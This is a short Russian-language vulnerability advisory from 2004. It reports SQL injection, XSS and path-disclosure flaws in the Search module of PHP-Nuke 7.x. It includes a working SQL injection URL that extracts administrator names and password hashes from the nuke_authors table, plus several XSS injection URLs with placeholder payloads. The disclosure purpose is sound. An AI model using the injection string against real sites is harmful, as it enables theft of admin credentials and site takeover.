Security Lab

Несколько уязвимостей в PHP-Nuke

Дата публикации:20.07.2004
Всего просмотров:2973
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2004-0736
CVE-2004-0737
CVE-2004-0738
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHP-Nuke 7.x
Уязвимые версии: PHP-Nuke

Описание: Несколько уязвимостей обнаружено в PHP-Nuke в 'Search' модуле. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь.

1. SQL инъекция:

http://localhost/nuke73/modules.php?name=Search&type=stories&query=f00bar&category=-1
&categ=%2 0and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*
2. XSS:
http://localhost/nuke73/modules.php?name=Search&sid=[xss code here]
http://localhost/nuke73/modules.php?name=Search&query=*&max=[xss code here]
http://localhost/nuke73/modules.php?name=Search&query=waraxe&sel1=[xss code here]&type=comments
http://localhost/nuke73/modules.php?name=Search&a=6&query=*&match=[xss code here]
http://www.nukecops.com/modules.php?name=Search&query=*&m od3=[xss code here]

URL производителя: http://www.phpnuke.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [waraxe-2004-SA#036 - Multiple security holes in PhpNuke - part 3]